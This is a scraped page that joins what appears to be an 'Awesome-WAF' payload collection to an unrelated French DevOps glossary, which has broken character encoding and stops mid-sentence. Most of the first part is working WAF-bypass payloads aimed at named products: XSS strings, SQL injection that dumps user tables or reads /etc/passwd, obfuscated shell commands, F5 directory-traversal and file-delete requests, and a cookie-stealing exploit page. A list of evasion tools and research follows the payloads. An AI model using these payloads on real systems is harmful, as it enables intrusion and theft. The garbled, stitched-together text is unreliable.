alert dragme click GET - XSS Bypass (v4.02) by @DavidK /search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E POST - XSS Bypass (v4.02) by @DavidK clave XSS (v4.02) by @DavidK /?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ Fortinet Fortiweb pcre_expression unvaidated XSS by @Benjamin Mejri /waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C /waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0 CSP Bypass by @Binar10 POST Type Query POST //login-app.aspx HTTP/1.1 Host: User-Agent: Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: var1=datavar1&var2=datavar12&pad= GET Type Query http:///path?var1=vardata1&var2=vardata2&pad= F5 ASM XSS Bypass by @WAFNinja "/>a F5 BIG-IP XSS Bypass by @WAFNinja Right-Click Here Right-Click Here XSS Bypass by @Aatif Khan Right-Click Here ]> &e; Directory Traversal by @Anastasios Monachos Read Arbitrary File /tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd Delete Arbitrary File POST /tmui/Control/form HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd Content-Type: application/x-www-form-urlencoded _form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete F5 FirePass SQLi Bypass from @Anonymous state=%2527+and+ (case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+ BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+ ModSecurity XSS Bypass for CRS 3.2 by @brutelogic RCE Payloads Detection Bypass for PL3 by @theMiddle (v3.1) ;+$u+cat+/etc$u/passwd$u RCE Payloads Detection Bypass for PL2 by @theMiddle (v3.1) ;+$u+cat+/etc$u/passwd+\# RCE Payloads for PL1 and PL2 by @theMiddle (v3.0) /???/??t+/???/??ss?? RCE Payloads for PL3 by @theMiddle (v3.0) /?in/cat+/et?/passw? SQLi Bypass by @Johannes Dahse (v2.2) 0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user SQLi Bypass by @Yuri Goltsev (v2.2) 1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min') SQLi Bypass by @Ahmad Maulana (v2.2) 1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*- SQLi Bypass by @Travis Lee (v2.2) amUserId=1 union select username,password,3,4 from users SQLi Bypass by @Roberto Salgado (v2.2) %0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201 SQLi Bypass by @Georgi Geshev (v2.2) 1%0bAND(SELECT%0b1%20FROM%20mysql.x) SQLi Bypass by @SQLMap Devs (v2.2) %40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29 SQLi Bypass by @HackPlayers (v2.2) %0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201 Imperva XSS Bypass by @smaury92 XSS Bypass by @0xInfection clickme XSS Bypass by @0xInfection click XSS Bypass by @0xInfection pew XSS Bypass by @ugurercan Imperva SecureSphere 13 - Remote Command Execution by @rsp3ar XSS Bypass by @David Y XSS Bypass by @Emad Shanab anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz XSS Bypass by @WAFNinja %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E XSS Bypass by @i_bo0om <img/src=q onerror='new Function`al\ert\`1\``'> XSS Bypass by @c0d3g33k <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> SQLi Bypass by @DRK1WI 15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' SQLi by @Giuseppe D'Amore stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1 Imperva SecureSphere <= v13 - Privilege Escalation by @0x09AL Kona SiteDefender XSS Bypass by @SaadAhmed %3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E XSS Bypass by @h1_kenan asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie) HTML Injection by @sp1d3rs %2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E XSS Bypass by @Jonathan Bouman <body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)" XSS Bypass by @zseano ?"></script><base%20c%3D=href%3Dhttps:\mysite> XSS Bypass by @0xInfection <abc/onmouseenter=confirm%60%60> XSS Bypass by @sp1d3rs %2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E XSS Bypass by @Frans RosĂ©n <style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`> XSS Bypass by @Ishaq Mohammed <marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'> Profense GET Type CSRF Attack by @Michael Brooks (>= v.2.6.2) Turn off Proface Machine <img src=https://host:2000/ajax.html?action=shutdown> Add a proxy <img src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save> XSS Bypass by @Michael Brooks (>= v.2.6.2) https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script> XSS Bypass by @EnableSecurity (>= v2.4) %3CEvil%20script%20goes%20here%3E=%0AByPass %3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E QuickDefense XSS Bypass by @WAFNinja ?<input type="search" onsearch="aler\u0074(1)"> <details ontoggle=alert(1)> Sucuri XSS Bypass (POST Only) by @brutelogic <a href=javascript:confirm(1)> Smuggling RCE Payloads by @theMiddle /???/??t+/???/??ss?? Obfuscating RCE Payloads by @theMiddle ;+cat+/e'tc/pass'wd c\\a\\t+/et\\c/pas\\swd XSS Bypass by @Luka "><input/onauxclick="[1].map(prompt)"> XSS Bypass by @Brute Logic data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post> <input type=hidden name=a value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>"> <input type=submit></form> StackPath XSS Bypass by @0xInfection <object/data=javascript:alert()> <a/href="javascript%0A%0D:alert()>clickme URLScan Directory Traversal by @ZeQ3uL (<= v3.1) (Only on ASP.NET) http://host.com/test.asp?file=.%./bla.txt WebARX Cross Site Scripting by @0xInfection <a69/onauxclick=open()>rightclickhere Bypassing All Protections Using A Whitelist String by @Osanda Malith XSS PoC http://host.com/?vulnparam=<script>alert()</script>&ithemes-sync-request LFI PoC http://host.com/?vulnparam=../../../../../etc/passwd&ithemes-sync-request SQLi PoC http://host.com/?vulnparam=1%20unionselect%20@@version,2--&ithemes-sync-request WebKnight Cross Site Scripting by @WAFNinja <isindex action=j	a	vas	c	r	ipt:alert(1) type=image> <marquee/onstart=confirm(2)> <details ontoggle=alert(1)> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"> <img src=x onwheel=prompt(1)> SQLi by @WAFNinja 0 union(select 1,username,password from(users)) 0 union(select 1,@@hostname,@@datadir) XSS Bypass by @Aatif Khan (v4.1) <details ontoggle=alert(1)> <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"> SQLi Bypass by @ZeQ3uL 10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables) Wordfence XSS Bypass by @brute Logic <a href=javascript:alert(1)> <a href=javascript:alert(1)> XSS Bypass by @0xInfection <a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:/**/alert()/**/>click HTML Injection by @Voxel http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php XSS Exploit by @MustLive (>= v3.3.5) <html> <head> <title>Wordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"> <input type="hidden" name="email" value="<script>alert(document.cookie)</script>"> </form> </body> </html> Other XSS Bypasses <meter onmouseover="alert(1)" '">><div><meter onmouseover="alert(1)"</div>" >><marquee loop=1 width=0 onfinish=alert(1)> Apache Generic Writing method type in lowercase by @i_bo0om get /login HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) IIS Generic Tabs before method by @i_bo0om GET /login.php HTTP/1.1 Host: favoritewaf.com User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) Awesome Tools Fingerprinting: WAFW00F - The ultimate WAF fingerprinting tool with the largest fingerprint database from @EnableSecurity . IdentYwaf - A blind WAF detection tool which utlises a unique method of identifying WAFs based upon previously collected fingerprints by @stamparm . Testing: GoTestWAF - A tool to test a WAF's detection logic and bypasses from @wallarm . Lightbulb Framework - A WAF testing suite written in Python. WAFBench - A WAF performance testing suite by Microsoft . WAF Testing Framework - A WAF testing tool by Imperva . Framework for Testing WAFs (FTW) - A framework by the OWASP CRS team that helps to provide rigorous tests for WAF rules by using the OWASP Core Ruleset V3 as a baseline. Evasion: WAFNinja - A smart tool which fuzzes and can suggest bypasses for a given WAF by @khalilbijjou . WAFTester - Another tool which can obfuscate payloads to bypass WAFs by @Raz0r . libinjection-fuzzer - A fuzzer intended for finding libinjection bypasses but can be probably used universally. bypass-firewalls-by-DNS-history - A tool which searches for old DNS records for finding actual site behind the WAF. abuse-ssl-bypass-waf - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs. SQLMap Tamper Scripts - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs. Bypass WAF BurpSuite Plugin - A plugin for Burp Suite which adds some request headers so that the requests seem from the internal network. enumXFF - Eumerating IPs in X-Forwarded-Headers to bypass 403 restrictions WAF Bypass Tool - WAF bypass Tool from Nemesida is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Management: AWS Firewall Factory - Deploy, update, and stage your WAFs while managing them centrally via FMS. Blogs and Writeups Many of the content mentioned above have been taken from some of the following excellent writeups. Web Application Firewall (WAF) Evasion Techniques #1 - By @Secjuice . Web Application Firewall (WAF) Evasion Techniques #2 - By @Secjuice . Web Application Firewall (WAF) Evasion Techniques #3 - By @Secjuice . How To Exploit PHP Remotely To Bypass Filters & WAF Rules - By @Secjuice ModSecurity SQL Injection Challenge: Lessons Learned - By @SpiderLabs . XXE that can Bypass WAF - By @WallArm . SQL Injection Bypassing WAF - By @OWASP . How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing - By @SunnyHoi . Bypassing Web-Application Firewalls by abusing SSL/TLS - By @0x09AL . Request Encoding to Bypass WAFs - By @Soroush Dalili Video Presentations WAF Bypass Techniques Using HTTP Standard and Web Servers Behavior from @OWASP . Confessions of a WAF Developer: Protocol-Level Evasion of Web App Firewalls from BlackHat USA 12 . Web Application Firewall - Analysis of Detection Logic from BlackHat . Bypassing Browser Security Policies for Fun & Profit from BlackHat . Web Application Firewall Bypassing from Positive Technologies . Fingerprinting Filter Rules of Web Application Firewalls - Side Channeling Attacks from @UseNix . Evading Deep Inspection Systems for Fun and Shell from BlackHat US 13 . Bypass OWASP CRS && CWAF (WAF Rule Testing - Unrestricted File Upload) from Fools of Security . WAFs FTW! A modern devops approach to security testing your WAF from AppSec USA 17 . Web Application Firewall Bypassing WorkShop from OWASP . Bypassing Modern WAF's Exemplified At XSS by Rafay Baloch from Rafay Bloch . WTF - WAF Testing Framework from AppSecUSA 13 . The Death of a Web App Firewall from Brian McHenry . Adventures with the WAF from BSides Manchester . Bypassing Intrusion Detection Systems from BlackHat . Building Your Own WAF as a Service and Forgetting about False Positives from Auscert . Presentations & Research Papers Research Papers: Protocol Level WAF Evasion - A protocol level WAF evasion techniques and analysis by Qualys . Neural Network based WAF for SQLi - A paper about building a neural network based WAF for detecting SQLi attacks. Bypassing Web Application Firewalls with HTTP Parameter Pollution - A research paper from Exploit DB about effectively bypassing WAFs via HTTP Parameter Pollution. Poking A Hole in the Firewall - A paper by Rafay Baloch about modern firewall analysis. Modern WAF Fingerprinting and XSS Filter Bypass - A paper by Rafay Baloch about WAF fingerprinting and bypassing XSS filters. WAF Evasion Testing - A WAF evasion testing guide from SANS . Side Channel Attacks for Fingerprinting WAF Filter Rules - A paper about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12 . WASC WAF Evaluation Criteria - A guide for WAF Evaluation from Web Application Security Consortium . WAF Evaluation and Analysis - A paper about WAF evaluation and analysis of 2 most used WAFs (ModSecurity & WebKnight) from University of Amsterdam . Bypassing all WAF XSS Filters - A paper about bypassing all XSS filter rules and evading WAFs for XSS. Beyond SQLi - Obfuscate and Bypass WAFs - A research paper from Exploit Database about obfuscating SQL injection queries to effectively bypass WAFs. Bypassing WAF XSS Detection Mechanisms - A research paper about bypassing XSS detection mechanisms in WAFs. Presentations: Methods to Bypass a Web Application Firewall - A presentation from PT Security about bypassing WAF filters and evasion. Web Application Firewall Bypassing (How to Defeat the Blue Team) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by @OWASP . WAF Profiling & Evasion Techniques - A WAF testing and evasion guide from OWASP . Protocol Level WAF Evasion Techniques - A presentation at about efficiently evading WAFs at protocol level from BlackHat US 12 . Analysing Attacking Detection Logic Mechanisms - A presentation about WAF logic applied to detecting attacks from BlackHat US 16 . WAF Bypasses and PHP Exploits - A presentation about evading WAFs and developing related PHP exploits. Side Channel Attacks for Fingerprinting WAF Filter Rules - A presentation about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12 . Our Favorite XSS Filters/IDS and how to Attack Them - A presentation about how to evade XSS filters set by WAF rules from BlackHat USA 09 . Playing Around with WAFs - A small presentation about WAF profiling and playing around with them from Defcon 16 . A Forgotten HTTP Invisibility Cloak - A presentation about techniques that can be used to bypass common WAFs from BSides Manchester . Building Your Own WAF as a Service and Forgetting about False Positives - A presentation about how to build a hybrid mode waf that can work both in an out-of-band manner as well as inline to reduce false positives and latency Auscert2019 . Credits & License: Initial fingerprint compilation and bypasses were put together by Pinaki (0xInfection) , but now it largely remains as a community supported repository. Awesome-WAF is licensed under the Apache 2.0 License . Glossaire DevOps Agile Un framework agile une structure mĂ©thodologique qui fournit des lignes directrices, des pratiques, et des processus pour aider les Ă©quipes Ă organiser, planifier, exĂ©cuter et suivre leur travail de maniĂšre itĂ©rative et collaborative. Ce dĂ©veloppement itĂ©ratif dĂ©coupe un projet en sous-projets pour lesquels, on se fixe des objectifs Ă court termes atteignables. Ces sous-projets sont appelĂ©s des sprints et sont de courtes durĂ©es. Le but dâun framework agile est de livrer rapidement au client une premiĂšre version du produit qui correspond Ă ses besoins, qui Ă©voluera ensuite au fil des versions. Framework agiles : Scrum, eXtrem Programming, ⊠Air Gap âAir Gapâ (littĂ©ralement « coupure dâair ») est une mesure de sĂ©curitĂ© dans laquelle un ordinateur ou un rĂ©seau est isolĂ© physiquement de tout autre rĂ©seau, y compris Internet. Cette isolation est souvent rĂ©alisĂ©e en sâassurant quâaucune connexion physique ou sans fil ne relie lâordinateur ou le rĂ©seau en question Ă des systĂšmes externes. LâidĂ©e est de protĂ©ger les donnĂ©es et les systĂšmes contre les accĂšs non autorisĂ©s, les cyberattaques et les logiciels malveillants en Ă©liminant toute voie dâaccĂšs directe. Artefacts Les artefacts sont des Ă©lĂ©ments gĂ©nĂ©rĂ©s lors du processus dâintĂ©gration continue Ă partir dâun code source. Il peut ĂȘtre composĂ© de bibliothĂšques, de fichiers de configuration, dâexĂ©cutables, de fichiers de documentation, etc. Adresse IP Les adresses IP sont des identifiants numĂ©riques attribuĂ©s aux dispositifs connectĂ©s Ă un rĂ©seau, leur permettant de communiquer entre eux sur Internet ou au sein dâun rĂ©seau local. API Une API, ou Interface de Programmation dâApplications (Application Programming Interface), est un ensemble de rĂšgles et de protocoles pour la construction et lâinteraction de logiciels. Elle permet Ă diffĂ©rents programmes ou composants logiciels de communiquer entre eux. Une API dĂ©finit la maniĂšre dont les fonctions dâun programme peuvent ĂȘtre utilisĂ©es par dâautres programmes, facilitant ainsi leur intĂ©gration et leur interaction sans avoir besoin de connaĂźtre les dĂ©tails de leur mise en Ćuvre interne. Cela rend les processus de dĂ©veloppement plus rapides et plus flexibles, permettant aux dĂ©veloppeurs de crĂ©er des applications complexes et interconnectĂ©es. Automatisation Fonctionnement dâun systĂšme sans intervention humaine, automatisation dâune suite dâopĂ©ration. Elle peut ĂȘtre faĂźte via lâutilisation de scripts et/ou dâoutils qui vont permettre de rĂ©duire la charge de travail manuelle et accĂ©lĂ©rer les tĂąches rĂ©pĂ©titives. Autre avantage, elle limite la part des incidents dus Ă des erreurs humaines. Build Le build est la phase appelĂ©e aussi intĂ©gration. Elle consiste Ă assembler le code des dĂ©veloppeurs avec toutes ses dĂ©pendances afin de fournir un livrable de lâapplication. Dans cette phase, on retrouve, lâanalyse du code (lint), les tests unitaires et la compilation. CaaS CaaS, ou Container as a Service, est un modĂšle de service cloud qui permet aux utilisateurs de tĂ©lĂ©charger, organiser, exĂ©cuter, Ă©chelonner, gĂ©rer et arrĂȘter des conteneurs en utilisant une plateforme dâhĂ©bergement basĂ©e sur le cloud. Campagne de patchs Une campagne de patch est un processus visant Ă appliquer des correctifs (patches) amĂ©liorant la sĂ©curitĂ© et la stabilitĂ© Ă un ensemble de systĂšmes, de logiciels ou dâinfrastructures informatiques de maniĂšre coordonnĂ©e. Ces correctifs sont conçus pour rĂ©soudre des failles de sĂ©curitĂ©, des bogues ou pour amĂ©liorer les performances dâun logiciel ou dâun systĂšme. CI/CD CI/CD (Continuous Integration / Continuous Deployment) : Pratiques visant Ă automatiser le processus dâintĂ©gration, de test et de dĂ©ploiement pour livrer rapidement et rĂ©guliĂšrement des mises Ă jour logicielles. CLI Une CLI, ou Command Line Interface (Interface en Ligne de Commande), est une interface utilisateur qui permet aux utilisateurs dâinteragir avec un logiciel ou un systĂšme dâexploitation en tapant des commandes textuelles dans un terminal ou une console. Cloud Le cloud fait rĂ©fĂ©rence Ă la fourniture de services informatiques tels que le stockage, le calcul, les bases de donnĂ©es, la mise en rĂ©seau, lâanalyse, etc., via Internet. PlutĂŽt que de possĂ©der et de gĂ©rer physiquement des serveurs et des infrastructures informatiques, les entreprises et les individus peuvent accĂ©der Ă ces ressources Ă partir de serveurs distants exploitĂ©s par des fournisseurs de cloud publics . Cloud Hybride Un cloud hybride est un environnement informatique qui combine Ă la fois des ressources de cloud public et de cloud privĂ© , permettant aux donnĂ©es et aux applications de sâexĂ©cuter de maniĂšre transparente entre les deux. ConcrĂštement, cela signifie que les entreprises peuvent dĂ©ployer des applications et des donnĂ©es Ă la fois sur des serveurs et des infrastructures internes (cloud privĂ©) et sur des ressources de cloud public, le tout dans un environnement cohĂ©rent. Cluster Un cluster est un groupe de machines (nĆuds) interconnectĂ©es qui travaillent ensemble pour exĂ©cuter des applications conteneurisĂ©es. Dans le cadre de Kubernetes, un cluster est constituĂ© dâun plan de contrĂŽle (control plane) et de plusieurs nĆuds de travail. Les clusters offrent une haute disponibilitĂ© et une scalabilitĂ© en rĂ©partissant les charges de travail sur plusieurs machines. CMP Une CMP (Cloud Management Platform) dĂ©signe une plateforme logicielle conçue pour gĂ©rer et orchestrer les ressources, services et opĂ©rations dans un environnement cloud. Conteneurs / Conteneurisation Un conteneur est une unitĂ© dâexĂ©cution autonome qui regroupe une application, ses dĂ©pendances logicielles et toutes les ressources nĂ©cessaires Ă son exĂ©cution, y compris des bibliothĂšques, des fichiers de configuration et des variables dâenvironnement. Les conteneurs sont conçus pour isoler une application et son environnement de maniĂšre Ă ce quâelle puisse ĂȘtre dĂ©ployĂ©e et exĂ©cutĂ©e de maniĂšre cohĂ©rente. Cette technologie permet de porter une application sur nâimporte quel serveur, local ou dans le cloud, Ă la seule condition de possĂ©der la mĂȘme architecture et la mĂȘme famille de systĂšme dâexploitation. CRD (Custom Resource Definition) Une CRD permet de dĂ©finir des ressources personnalisĂ©es dans Kubernetes. Cela permet aux utilisateurs dâĂ©tendre les fonctionnalitĂ©s de Kubernetes en ajoutant de nouveaux types dâobjets spĂ©cifiques Ă leurs besoins. DĂ©claratif vs ImpĂ©ratif Dans une approche dĂ©clarative , le code de configuration dĂ©crit lâĂ©tat dans lequel lâenvironnement de production doit se trouver, sans prendre en compte les Ă©tapes pour y arriver. Le systĂšme fait en sorte que lâinfrastructure atteigne lâĂ©tat dĂ©sirĂ©. Dans une approche impĂ©rative , le fichier de configuration dĂ©finit les commandes et les Ă©tapes nĂ©cessaires pour que lâenvironnement parvienne Ă lâĂ©tat dĂ©sirĂ©. Le systĂšme rĂ©alise les commandes indiquĂ©es. Exemple : Ansible DĂ©ploiement Blue-Green Une mĂ©thode de dĂ©ploiement qui permet de basculer en douceur entre deux environnements (bleu et vert) pour minimiser les interruptions de service. DĂ©ploiement Continu DĂ©ploiement ou livraison continue est une mĂ©thode de dĂ©veloppement de logiciels dans le cadre de laquelle les modifications de code sont automatiquement prĂ©parĂ©es en vue de leur publication dans un environnement de production. La livraison continue Ă©tend le principe de lâintĂ©gration continue en dĂ©ployant tous les changements de code dans un environnement de test et/ou de production aprĂšs lâĂ©tape de crĂ©ation. Lorsque la livraison continue est correctement implĂ©mentĂ©e, les dĂ©veloppeurs disposent en permanence dâun artefact de gĂ©nĂ©ration prĂȘt pour le dĂ©ploiement qui a Ă©tĂ© soumis avec succĂšs Ă un processus de test standardisĂ©. Dette Technique La dette technique est une mĂ©taphore utilisĂ©e pour dĂ©crire le coĂ»t cachĂ© associĂ© au retard ou Ă la nĂ©gligence des bonnes pratiques de dĂ©veloppement, de maintenance et de gestion des systĂšmes informatiques. Cela se produit lorsque des raccourcis, des compromis ou des dĂ©cisions techniques inadĂ©quates sont pris pour accĂ©lĂ©rer le dĂ©veloppement dâun logiciel ou pour rĂ©pondre Ă des Ă©chĂ©ances serrĂ©es. La dette technique est le reflet des consĂ©quences nĂ©gatives de ces choix Ă long terme. DevSecOps IntĂ©gration de la sĂ©curitĂ© dans les pipelines CI/CD dĂšs le dĂ©but du dĂ©veloppement. Edge Computing Le Edge Computing est une architecture informatique dĂ©centralisĂ©e qui rapproche les ressources de calcul et de traitement des donnĂ©es des pĂ©riphĂ©riques ou des utilisateurs finaux. Cette approche est couramment utilisĂ©e pour rĂ©duire la latence et la consommation de bande passante dans des environnements distribuĂ©s comme lâIoT ou les systĂšmes connectĂ©s. ĂlasticitĂ© LâĂ©lasticitĂ© est la capacitĂ© dâun systĂšme informatique dâajuster dynamiquement les ressources (comme la puissance de calcul, la mĂ©moire, le stockage, etc.) en fonction de la demande des utilisateurs. ĂlĂ©vation de privilĂšges LâĂ©lĂ©vation de privilĂšges (ou privilege escalation en anglais) fait rĂ©fĂ©rence au processus par lequel un utilisateur ou un processus tente dâacquĂ©rir des privilĂšges ou des autorisations supplĂ©mentaires au sein dâun systĂšme informatique, lui permettant ainsi dâexĂ©cuter des actions pour lesquelles il nâavait pas initialement les droits. LâĂ©lĂ©vation de privilĂšges est Ă©galement un sujet important dans le domaine de la sĂ©curitĂ© informatique, car les vulnĂ©rabilitĂ©s qui permettent une Ă©lĂ©vation de privilĂšges peuvent ĂȘtre exploitĂ©es pour compromettre la sĂ©curitĂ© dâun systĂšme. Les correctifs de sĂ©curitĂ© sont souvent publiĂ©s pour corriger de telles vulnĂ©rabilitĂ©s et empĂȘcher les attaquants dâacquĂ©rir des privilĂšges non autorisĂ©s. Gestion des configurations La gestion de configuration est un concept fondamental dans lâadministration des systĂšmes et des infrastructures informatiques. Elle englobe lâensemble des processus et des outils utilisĂ©s pour dĂ©finir, mettre en place, surveiller et maintenir les configurations, quâil sâagisse de serveurs, de postes de travail, de logiciels ou dâĂ©quipements rĂ©seaux. Gestionnaire de ContrĂŽle de version Un gestionnaire de contrĂŽle de version, Ă©galement appelĂ© logiciel de gestion de version ou systĂšme de contrĂŽle de version (VCS), est un outil informatique qui permet de suivre et de gĂ©rer les modifications apportĂ©es Ă un ensemble de fichiers au fil du temps. Son principal objectif est de faciliter la collaboration entre plusieurs personnes travaillant sur un mĂȘme projet informatique, que ce soit un logiciel, un site web, une documentation. Le plus utilisĂ© actuellement sâappelle Git. Gestion des secrets La gestion des secrets dĂ©signe la pratique permettant de gĂ©rer de maniĂšre sĂ©curisĂ©e les informations sensibles, telles que les mots de passe, les clĂ©s dâauthentification, les jetons dâaccĂšs, les clĂ©s de chiffrement et dâautres donnĂ©es confidentielles, utilisĂ©es dans les applications, les systĂšmes et les infrastructures informatiques. Cette pratique est essentielle pour garantir la sĂ©curitĂ© des systĂšmes dâinformations, car toute faille dans la protection de ces donnĂ©es pourrait entraĂźner des violations de sĂ©curitĂ©, des accĂšs non autorisĂ©s, des pertes de donnĂ©es⊠Haute DisponibilitĂ© La haute disponibilitĂ© (HA) est un concept en informatique qui se rĂ©fĂšre Ă la capacitĂ© dâun systĂšme, dâune application ou dâun service Ă rester opĂ©rationnel et accessible pendant une pĂ©riode de temps prolongĂ©e, gĂ©nĂ©ralement 24 heures sur 24 et 7 jours sur 7. Lâobjectif de la haute disponibilitĂ© est de minimiser les temps dâarrĂȘt non planifiĂ©s, dâassurer la continuitĂ© des opĂ©rations et de garantir que les utilisateurs finaux puissent accĂ©der aux ressources informatiques sans interruption notable. Pour atteindre un haut niveau de disponibilitĂ©, les organisations mettent en place des architectures redondantes, des clusters, des systĂšmes de basculement et des tests rigoureux de continuitĂ© des opĂ©rations. Cela garantit que les systĂšmes restent opĂ©rationnels mĂȘme en cas de dĂ©faillance matĂ©rielle, de coupures dâĂ©lectricitĂ©, de catastrophes naturelles ou de cyberattaques. Helm Helm est un gestionnaire de packages pour Kubernetes. Il permet de simplifier lâinstallation, la gestion et la mise Ă jour des applications Kubernetes en utilisant des charts (modĂšles de dĂ©ploiement). Helm est particuliĂšrement utile pour dĂ©ployer des applications complexes avec des dĂ©pendances multiples. IAAS IaaS est lâacronyme de âInfrastructure as a Serviceâ, qui se traduit en français par âInfrastructure en tant que Serviceâ. Il sâagit dâun modĂšle de cloud qui aux utilisateurs de provisionner des ressources dâinfrastructures informatiques sous forme de services. Idempotence En algĂšbre, lâ idempotence est la propriĂ©tĂ© dâune opĂ©ration, dâavoir le mĂȘme effet quâon lâapplique une ou plusieurs fois. Par exemple, la valeur absolue est idempotente : abs(abs(â5)) = abs(â5), les deux membres Ă©tant Ă©gaux Ă 5. En programmation une fonction est idempotente si lâĂ©tat du systĂšme reste le mĂȘme aprĂšs un ou plusieurs appels. Infrastructure as Code Lâinfrastructure en tant que code (Infrastructure as Code) est une infrastructure informatique virtuelle qui est crĂ©Ă©e, configurĂ©e et approvisionnĂ©e automatiquement via du code informatique. IntĂ©gration Continue CI ou intĂ©gration continue est une mĂ©thode de dĂ©veloppement avec laquelle les dĂ©veloppeurs intĂšgrent rĂ©guliĂšrement leurs modifications de code Ă un rĂ©fĂ©rentiel centralisĂ©, suite Ă quoi des opĂ©rations de crĂ©ation et de tests sont automatiquement 